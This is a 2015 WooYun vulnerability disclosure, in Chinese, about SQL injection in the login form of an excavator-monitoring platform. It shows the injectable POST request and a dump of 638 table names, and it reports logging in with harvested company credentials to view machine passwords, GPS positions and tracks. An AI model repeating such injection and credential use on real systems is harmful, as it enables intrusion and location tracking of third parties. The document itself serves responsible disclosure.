当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138947

漏洞标题:某挖掘机监控平台SQL注入导致3000余家公司挖掘机信息泄露(账号/终端信息/车辆实时定位/历史轨迹等等信息)

相关厂商:徐工集团

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-06 13:51

修复时间:2015-10-23 19:46

公开时间:2015-10-23 19:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-08: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

某挖掘机监控平台SQL注入导致3000余家公司挖掘机信息泄露(账号/终端信息/车辆实时定位/历史轨迹等等信息),这回不用去蓝翔了!

详细说明:

1.控制平台页面URL:
http://**.**.**.**/pmvm5/logon.asp

登陆页面.png


如上图,用户名存在注入

POST /pmvm5/userLogin/LoginCheck.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/pmvm5/logon.asp
Cookie: ASPSESSIONIDCQTDBRCD=IPGJEBAAEKOJJCONJIONGIKK
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
EOSOperator%2FuserID=123&TMPEOSOperator%2FuserID=&TMPEOSOperator%2Fpassword=&hciPasswordTypeEOSOperator%2Fpassword=1234&Image1.x=20&Image1.y=2


EOSOperator%2FuserID参数存在注入,涉及18个库

18个库.png


当前库600多个表

Database: YC2
[638 tables]
+-----------------------------+
| FUNCTION                    |
| RIGHT                       |
| AAAA                        |
| AA_SIM                      |
| AA_TEMP_TAB                 |
| ALARMDATA                   |
| ALWAYSMENU                  |
| AREA                        |
| AREAPOINT                   |
| A_TEMP                      |
| CASE_VEHICLE                |
| CATINFOBASE                 |
| CATINFOBASE2                |
| CATINFOBASE201001           |
| CATINFOBASE201002           |
| CATINFOBASE201003           |
| CATINFOBASE201004           |
| CATINFOBASE201005           |
| CATINFOBASE201006           |
| CATINFOBASE201007           |
| CATINFOBASE201008           |
| CATINFOBASE201009           |
| CATINFOBASE201010           |
| CATINFOBASE201105           |
| CATINFOBASE201106           |
| CATINFOBASE201303           |
| CATINFOBASE201304           |
| CATINFOBASE201305           |
| CATINFOBASE201306           |
| CATINFOBASE201307           |
| CATINFOBASE201308           |
| CATINFOBASE201309           |
| CATINFOBASE201310           |
| CATINFOBASE201311           |
| CATINFOBASE201312           |
| CATINFOBASE201401           |
| CATINFOBASE201402           |
| CATINFOBASE201403           |
| CATINFOBASE201404           |
| CATINFOBASE201405           |
| CATINFOBASE201406           |
| CATINFOBASE201407           |
| CATINFOBASE201408           |
| CATINFOBASE201409           |
| CATINFOBASE201410           |
| CATINFOBASE201411           |
| CATINFOBASE201412           |
| CATINFOBASE201501           |
| CATINFOBASE201502           |
| CATINFOBASE201503           |
| CATINFOBASE201504           |
| CATINFOBASE201505           |
| CATINFOBASE201506           |
| CATINFOBASE201507           |
| CATINFOBASE201508           |
| CATINFOBASE201509           |
| CATINFOBASE201510           |
| CATINFOBASE201511           |
| CATINFOBASE201512           |
| CATVEHICLELOG               |
| CITY                        |
| COMMUNICATIONTYPE           |
| CONTRACTLOAN                |
| CONTRACTREPAY               |
| CQKGJTYPE                   |
| CROSSPROVINCEINFO           |
| CURPOSFAILD                 |
| CUTOFFALARM                 |
| CUTOFFALARMCLASS            |
| DATAOFSYSTEM                |
| DEVICETYPE                  |
| DFAULTCODE                  |
| DISTRICTINFO                |
| DTCAISI31                   |
| ERRLOG                      |
| ERRTEST                     |
| FAULTINFO                   |
| FINANCINGORG                |
| FUNCTIONPROPERTY            |
| FUNCTIONTEST                |
| FUNCTIONTESTRECORD          |
| GPRSUNLOCKVEHICLES          |
| GROUPPARAM                  |
| HEAVYLOG                    |
| INDUSTRYCATEGORY            |
| INFORMINFO                  |
| JHHH                        |
| JX50_HIT                    |
| LOCKLOG                     |
| LOCKLOGSMS                  |
| LOCKMANAGER                 |
| LOCKMANAGER_HISTORY         |
| MAPSCALE                    |
| MENU                        |
| MENULIST                    |
| MESSAGESET                  |
| METERTYPE                   |
| MOBILEINFOMANAGE            |
| MOBILENOLOG                 |
| MOBILESTATIONTYPE           |
| NETEXCEPTION                |
| NETLOG                      |
| OLDLIST                     |
| ONLINERATES201110           |
| ONLINERATES201111           |
| ONLINERATES201112           |
| ONLINERATES201202           |
| ONLINERATES201203           |
| ONLINERATES201204           |
| ONLINERATES201205           |
| ONLINERATES201206           |
| ONLINERATES201207           |
| ONLINERATES201208           |
| ONLINERATES201209           |
| ONLINERATES201210           |
| ONLINERATES201211           |
| ONLINERATES201212           |
| ONLINERATES201301           |
| ONLINERATES201302           |
| ONLINERATES201303           |
| ONLINERATES201304           |
| OPERATETYPELIST             |
| OPERATINFOLOG               |
| OPERATORLOG                 |
| ORIENTATIONLOG              |
| PHONEBOOK                   |
| PHONELIST                   |
| PHONETYPE                   |
| PMX_DATA                    |
| POPEDOMDATA                 |
| POPEDOMINFO                 |
| POPEDOMVEHICLE              |
| PROC_TEMPTB_TRACEINFO       |
| PROPERTY                    |
| PROPERTYRIGHT               |
| REPAIR                      |
| RESETACCTIMES               |
| RESULTTABLE                 |
| RETURNVISIT                 |
| RIGHTVEHICLE                |
| ROLE                        |
| ROLERIGHT                   |
| ROLERIGHTVEH                |
| ROLERIGHTVEHMID             |
| ROLETYPE                    |
| ROLEVEHICLE                 |
| RUNBASETABLE201201          |
| RUNBASETABLE201202          |
| RUNBASETABLE201203          |
| RUNBASETABLE201204          |
| RUNBASETABLE201205          |
| RUNBASETABLE201206          |
| RUNBASETABLE201207          |
| RUNBASETABLE201208          |
| RUNBASETABLE201209          |
| RUNBASETABLE201210          |
| RUNPARAM                    |
| RUNTRACETABLE201206         |
| RUNTRACETABLE201207         |
| RUNTRACETABLE201208         |
| RUNTRACETABLE201209         |
| RUNTRACETABLE201210         |
| RUSERVEHICLE                |
| RUSERVEHICLE_20120828       |
| SCATICMENU                  |
| SENDLOCK                    |
| SENDTEMP                    |
| SERVERLOG2007               |
| SERVERLOG2008               |
| SERVERLOG2009               |
| SERVERLOG2010               |
| SERVERLOG2011               |
| SERVERLOG2012               |
| SERVERLOG2013               |
| SERVERLOG2014               |
| SERVERLOG2015               |
| SERVICE_PLAT_SYNC_DEL       |
| SGALARM201201               |
| SGALARM201202               |
| SGALARM201203               |
| SGALARM201204               |
| SGALARM201205               |
| SGALARM201206               |
| SGALARM201207               |
| SGALARM201208               |
| SGALARM201209               |
| SGALARM201210               |
| SGALARM201211               |
| SGALARM201212               |
| SGALARM201301               |
| SGALARM201302               |
| SGALARM201303               |
| SGALARM201304               |
| SGALARM201305               |
| SGALARM201306               |
| SGALARM201307               |
| SGALARM201308               |
| SGALARM201309               |
| SGALARM201310               |
| SGALARM201311               |
| SGALARM201312               |
| SGALARM201401               |
| SGALARM201402               |
| SGALARM201403               |
| SGALARM201404               |
| SGALARM201405               |
| SGALARM201406               |
| SGALARM201407               |
| SGALARM201408               |
| SGALARM201409               |
| SGALARM201410               |
| SGALARM201411               |
| SGALARM201412               |
| SGALARM201501               |
| SGALARM201502               |
| SGALARM201503               |
| SGALARM201504               |
| SGALARM201505               |
| SGALARM201506               |
| SGALARM201507               |
| SGALARM201508               |
| SGALARM201509               |
| SGGPRSLOG20150516           |
| SGGPRSLOG20150517           |
| SGGPRSLOG20150518           |
| SGGPRSLOG20150519           |
| SGGPRSLOG20150520           |
| SGGPRSLOG20150521           |
| SGGPRSLOG20150522           |
| SGGPRSLOG20150523           |
| SGGPRSLOG20150524           |
| SGGPRSLOG20150525           |
| SGGPRSLOG20150526           |
| SGGPRSLOG20150527           |
| SGGPRSLOG20150528           |
| SGGPRSLOG20150529           |
| SGGPRSLOG20150530           |
| SGGPRSLOG20150531           |
| SGGPRSLOG20150601           |
| SGGPRSLOG20150602           |
| SGGPRSLOG20150603           |
| SGGPRSLOG20150604           |
| SGGPRSLOG20150605           |
| SGGPRSLOG20150606           |
| SGGPRSLOG20150607           |
| SGGPRSLOG20150608           |
| SGGPRSLOG20150609           |
| SGGPRSLOG20150610           |
| SGGPRSLOG20150611           |
| SGGPRSLOG20150612           |
| SGGPRSLOG20150613           |
| SGGPRSLOG20150614           |
| SGGPRSLOG20150615           |
| SGGPRSLOG20150616           |
| SGGPRSLOG20150617           |
| SGGPRSLOG20150618           |
| SGGPRSLOG20150619           |
| SGGPRSLOG20150620           |
| SGGPRSLOG20150621           |
| SGGPRSLOG20150622           |
| SGGPRSLOG20150623           |
| SGGPRSLOG20150624           |
| SGGPRSLOG20150625           |
| SGGPRSLOG20150626           |
| SGGPRSLOG20150627           |
| SGGPRSLOG20150628           |
| SGGPRSLOG20150629           |
| SGGPRSLOG20150630           |
| SGGPRSLOG20150701           |
| SGGPRSLOG20150702           |
| SGGPRSLOG20150703           |
| SGGPRSLOG20150704           |
| SGGPRSLOG20150705           |
| SGGPRSLOG20150706           |
| SGGPRSLOG20150707           |
| SGGPRSLOG20150708           |
| SGGPRSLOG20150709           |
| SGGPRSLOG20150710           |
| SGGPRSLOG20150711           |
| SGGPRSLOG20150712           |
| SGGPRSLOG20150713           |
| SGGPRSLOG20150714           |
| SGGPRSLOG20150715           |
| SGGPRSLOG20150716           |
| SGGPRSLOG20150717           |
| SGGPRSLOG20150718           |
| SGGPRSLOG20150719           |
| SGGPRSLOG20150720           |
| SGGPRSLOG20150721           |
| SGGPRSLOG20150722           |
| SGGPRSLOG20150723           |
| SGGPRSLOG20150724           |
| SGGPRSLOG20150725           |
| SGGPRSLOG20150726           |
| SGGPRSLOG20150727           |
| SGGPRSLOG20150728           |
| SGGPRSLOG20150729           |
| SGGPRSLOG20150730           |
| SGGPRSLOG20150731           |
| SGGPRSLOG20150801           |
| SGGPRSLOG20150802           |
| SGGPRSLOG20150803           |
| SGGPRSLOG20150804           |
| SGGPRSLOG20150805           |
| SGGPRSLOG20150806           |
| SGGPRSLOG20150807           |
| SGGPRSLOG20150808           |
| SGGPRSLOG20150809           |
| SGGPRSLOG20150810           |
| SGGPRSLOG20150811           |
| SGGPRSLOG20150812           |
| SGGPRSLOG20150813           |
| SGGPRSLOG20150814           |
| SGGPRSLOG20150815           |
| SGGPRSLOG20150816           |
| SGGPRSLOG20150817           |
| SGGPRSLOG20150818           |
| SGGPRSLOG20150819           |
| SGGPRSLOG20150820           |
| SGGPRSLOG20150821           |
| SGGPRSLOG20150822           |
| SGGPRSLOG20150823           |
| SGGPRSLOG20150824           |
| SGGPRSLOG20150825           |
| SGGPRSLOG20150826           |
| SGGPRSLOG20150827           |
| SGGPRSLOG20150828           |
| SGGPRSLOG20150829           |
| SGGPRSLOG20150830           |
| SGGPRSLOG20150831           |
| SGGPRSLOG20150901           |
| SGGPRSLOG20150902           |
| SGGPRSLOG20150903           |
| SGGPRSLOG20150904           |
| SGGPRSLOGTYPE               |
| SGKEYOFF                    |
| SGKEYON                     |
| SGSERVICE                   |
| SGSULT                      |
| SGTROUBLE                   |
| SHORTCUTMENU                |
| SMSLOG                      |
| SPEEDALARM                  |
| SUGGESTIONS                 |
| SYSTEMLOG                   |
| SYS_EXPORT_SCHEMA_01        |
| SYS_EXPORT_TABLE_01         |
| SYS_EXPORT_TABLE_02         |
| SYS_TEMP_FBT                |
| T1000                       |
| T100000                     |
| T10000000                   |
| T1250000                    |
| T20000                      |
| T20000000                   |
| T2500                       |
| T2500000                    |
| T500                        |
| T50000                      |
| T500000                     |
| T8000                       |
| TABLENAMELOGS               |
| TABLENAMELOGST              |
| TACKCARECONTENT             |
| TAKECARE                    |
| TAKEPLAN                    |
| TEREXOPERATLOG              |
| TERMINALOPERATELOG          |
| TERMINALOPERATELOG2010      |
| TERMINALOPERATELOG201203    |
| TERMINALOPERATELOG201204    |
| TERMINALOPERATELOG201205    |
| TERMINALOPERATELOG201206    |
| TERMINALOPERATELOG201207    |
| TERMINALOPERATELOG201208    |
| TERMINALOPERATELOG201209    |
| TERMINALOPERATELOG201210    |
| TERMINALOPERATELOG201211    |
| TERMINALOPERATELOG201212    |
| TERMINALOPERATELOG201301    |
| TERMINALOPERATELOG201302    |
| TERMINALOPERATELOG201303    |
| TERMINALOPERATELOG201304    |
| TERMINALOPERATELOG201305    |
| TERMINALOPERATELOG201306    |
| TERMINALOPERATELOG201307    |
| TERMINALOPERATELOG201308    |
| TERMINALOPERATELOG201309    |
| TERMINALOPERATELOG201310    |
| TERMINALOPERATELOG201311    |
| TERMINALOPERATELOG201312    |
| TERMINALOPERATELOG201401    |
| TERMINALOPERATELOG201402    |
| TERMINALOPERATELOG201403    |
| TERMINALOPERATELOG201404    |
| TERMINALOPERATELOG201405    |
| TERMINALOPERATELOG201406    |
| TERMINALOPERATELOG201407    |
| TERMINALOPERATELOG201408    |
| TERMINALOPERATELOG201409    |
| TERMINALOPERATELOG201410    |
| TERMINALOPERATELOG201411    |
| TERMINALOPERATELOG201412    |
| TERMINALOPERATELOG201501    |
| TERMINALOPERATELOG201502    |
| TERMINALOPERATELOG201503    |
| TERMINALOPERATELOG201504    |
| TERMINALOPERATELOG201505    |
| TERMINALOPERATELOG201506    |
| TERMINALOPERATELOG201507    |
| TERMINALOPERATELOG201508    |
| TERMINALOPERATELOG201509    |
| TERMINALOPERATELOG201510    |
| TERMINALOPERATELOG201511    |
| TERMINALOPERATELOG201512    |
| TEST201107                  |
| TEST201108                  |
| TEST20110916                |
| TMP_JBT_ACCTIMES            |
| TMP_JBT_SIM                 |
| TMP_MACHNDATA_ZN            |
| TOTALACCTIMES201003         |
| TOTALACCTIMES201004         |
| TOTALACCTIMES201005         |
| TOTALACCTIMES201006         |
| TOTALACCTIMES201007         |
| TOTALACCTIMES201008         |
| TOTALACCTIMES201009         |
| TOTALACCTIMES201010         |
| TOTALACCTIMES201011         |
| TOTALACCTIMES201012         |
| TOTALACCTIMES201101         |
| TOTALACCTIMES201102         |
| TOTALACCTIMES201103         |
| TOTALACCTIMES201104         |
| TOTALACCTIMES201105         |
| TOTALACCTIMES201106         |
| TOTALACCTIMES201107         |
| TOTALACCTIMES201108         |
| TOTALACCTIMES201109         |
| TOTALACCTIMES201110         |
| TOTALACCTIMES201111         |
| TOTALACCTIMES201112         |
| TOTALACCTIMES201201         |
| TOTALACCTIMES201202         |
| TOTALACCTIMES201203         |
| TOTALACCTIMES201204         |
| TOTALACCTIMES201205         |
| TOTALACCTIMES201206         |
| TOTALACCTIMES201207         |
| TOTALACCTIMES201208         |
| TOTALACCTIMES201209         |
| TOTALACCTIMES201210         |
| TOTALACCTIMES201211         |
| TOTALACCTIMES201212         |
| TOTALACCTIMES201301         |
| TOTALACCTIMES201302         |
| TOTALACCTIMES201303         |
| TOTALACCTIMES201304         |
| TOTALACCTIMES201305         |
| TOTALACCTIMES201306         |
| TOTALACCTIMES201307         |
| TOTALACCTIMES201308         |
| TOTALACCTIMES201309         |
| TOTALACCTIMES201310         |
| TOTALACCTIMES201311         |
| TOTALACCTIMES201312         |
| TOTALACCTIMES201401         |
| TOTALACCTIMES201402         |
| TOTALACCTIMES201403         |
| TOTALACCTIMES201404         |
| TOTALACCTIMES201405         |
| TOTALACCTIMES201406         |
| TOTALACCTIMES201407         |
| TOTALACCTIMES201408         |
| TOTALACCTIMES201409         |
| TOTALACCTIMES201410         |
| TOTALACCTIMES201411         |
| TOTALACCTIMES201412         |
| TOTALACCTIMES201501         |
| TOTALACCTIMES201502         |
| TOTALACCTIMES201503         |
| TOTALACCTIMES201504         |
| TOTALACCTIMES201505         |
| TOTALACCTIMES201506         |
| TOTALACCTIMES201507         |
| TOTALACCTIMES201508         |
| TOTALACCTIMES201509         |
| TOTALACCTIMES201510         |
| TOTALACCTIMES201511         |
| TOTALACCTIMES201512         |
| TTTT                        |
| TYPEPROPERTY                |
| TZ_TEST                     |
| UNIQUENOTEMPTABLE           |
| UNIQUENOTEMPTABLE_EXPORT    |
| UNITCONTAINERINFO           |
| UNITINFO                    |
| UNITINFO_20110306           |
| UNITINFO_20120902           |
| UNITINFO_58BAK              |
| UNITINFO_TEMP               |
| UNITRISKINFO                |
| UNITVEHFUNCION              |
| UNITVEHICLEBRAND            |
| UNITVEHMODEL                |
| UPDATEUNIQUENOLOG           |
| USERBDCOLOR                 |
| USERINFO                    |
| USERINFO_11                 |
| USERINFO_20110306           |
| USERINFO_TEMP               |
| VEHICLEALARM                |
| VEHICLECARTIME_JBT          |
| VEHICLECURPOS               |
| VEHICLECURPOS20130220       |
| VEHICLECURPOS2013022010     |
| VEHICLECURPOS20130408       |
| VEHICLECURPOS_1637          |
| VEHICLECURPOS_20120514BAK   |
| VEHICLECURPOS_20121015      |
| VEHICLECURPOS_20121018      |
| VEHICLECURPOS_20121116      |
| VEHICLECURPOS_58            |
| VEHICLECURPOS_58BAK         |
| VEHICLECURPOS_A             |
| VEHICLECURPOS_B             |
| VEHICLECURPOS_BAK           |
| VEHICLECURPOS_MYNEW         |
| VEHICLECURPOS_OLD1884       |
| VEHICLECURPOS_XVCHENG       |
| VEHICLEDEVICE               |
| VEHICLEFUNCTIONS            |
| VEHICLELASTALARM            |
| VEHICLELASTALARM_A          |
| VEHICLELASTALARM_B          |
| VEHICLELOG                  |
| VEHICLELOGOUT               |
| VEHICLELOG_A                |
| VEHICLELOG_OLD              |
| VEHICLEMENU                 |
| VEHICLEMODEL                |
| VEHICLEMODEL_20121112       |
| VEHICLEPROPERTY             |
| VEHICLEPROPERTY_20120412    |
| VEHICLEPROPERTY_20120514BAK |
| VEHICLEPROPERTY_20121015    |
| VEHICLEPROPERTY_20121112    |
| VEHICLEPROPERTY_20140930    |
| VEHICLEPROPERTY_ALLVEHICLE  |
| VEHICLEPROPERTY_MTLVIEW     |
| VEHICLEPROPERTY_TEMP        |
| VEHICLEPROPERTY_TEMP1       |
| VEHICLEPROPERTY_TMP         |
| VEHICLEPROPERTY_TMP1        |
| VEHICLERECHARGE             |
| VEHICLERECHARGE_BAK1        |
| VEHICLERUNNING              |
| VEHICLESTATICMENU           |
| VEHICLETASK                 |
| VEHICLETRACE                |
| VEHICLETRACE201006          |
| VEHICLETRACE201007          |
| VEHICLETRACE201008          |
| VEHICLETRACE201009          |
| VEHICLETRACE201010          |
| VEHICLETRACE201011          |
| VEHICLETRACE201012          |
| VEHICLETRACE201105          |
| VEHICLETRACE201106          |
| VEHICLETRACE201408          |
| VEHICLETRACE201409          |
| VEHICLETRACE201410          |
| VEHICLETRACE201411          |
| VEHICLETRACE201412          |
| VEHICLETRACE201501          |
| VEHICLETRACE201502          |
| VEHICLETRACE201503          |
| VEHICLETRACE201504          |
| VEHICLETRACE201505          |
| VEHICLETRACE201506          |
| VEHICLETRACE201507          |
| VEHICLETRACE201508          |
| VEHICLETRACE201509          |
| VEHICLETRACE201510          |
| VEHICLETRACE201511          |
| VEHICLETRACE201512          |
| VEHICLETYPE                 |
| VEHJBTACCTEMP               |
| VEHJBTDATATEMP              |
| VEHJBTTEMP                  |
| VEHL_A                      |
| VEH_A                       |
| VELPOS_LOG                  |
| WEBAGENTINFO                |
| WORKHOURS201306             |
| WORKHOURS201306_A           |
| WORKHOURS201307             |
| WORKHOURS201308             |
| WORKHOURS201309             |
| WORKHOURS201310             |
| WORKHOURS201311             |
| WORKHOURS201312             |
| WORKHOURS201401             |
| WORKHOURS201402             |
| WORKHOURS201403             |
| WORKHOURS201404             |
| WORKHOURS201405             |
| WORKHOURS201406             |
| WORKHOURS201407             |
| WORKHOURS201408             |
| WORKHOURS201409             |
| WORKHOURS201410             |
| WORKHOURS201411             |
| WORKHOURS201412             |
| WORKHOURS201501             |
| WORKHOURS201502             |
| WORKHOURS201503             |
| WORKHOURS201504             |
| WORKHOURS201505             |
| WORKHOURS201506             |
| WORKHOURS201507             |
| WORKHOURS201508             |
| WORKHOURS201509             |
| WORKHOURS201510             |
| WORKHOURS201511             |
| WORKHOURS201512             |
| WORKHOURS_40                |
| WORKHOURS_41                |
| WORKTIMES                   |
| WORKTIMES_OLD               |
| W_R5                        |
| XG_LONGMOVEALARM            |
| XG_VEHICLE                  |
| XU_SIM                      |
| XVCHENGTEMP1                |
| ZN_CSV_FILEINFO             |
| ZOOM                        |
+-----------------------------+


USERINFO表里有3700多个公司账号密码

3700个公司信息.png


账号密码.png

漏洞证明:

2.随便等进去一个账号

徐工.png


这个公司挖掘机还不少。。。
终端信息,包括机器密码

终端信息.png


GPS定位

gps定位.jpg


可以查看具体坐标和历史轨迹

历史轨迹.jpg


蓝翔学生没准可以过去开走。。。其他信息太专业看不太懂,就不测试了

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-08 19:44

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-04 13:53 | prolog ( 普通白帽子 | Rank:567 漏洞数:108 | 低调求发展)

    =_= 黑我大蓝翔

  2. 2015-09-04 13:55 | Xmyth_夏洛克 ( 普通白帽子 | Rank:1083 漏洞数:121 | 啥都不会)

    @xsser 厂商应该是天泽信息

  3. 2015-09-04 22:12 | 牛 小 帅 ( 普通白帽子 | Rank:483 漏洞数:117 | 茶凉了,就不要再续了,再续也不是原来的味...)

    @Xmyth_夏洛克 哈哈 请赐我挖掘机断网技术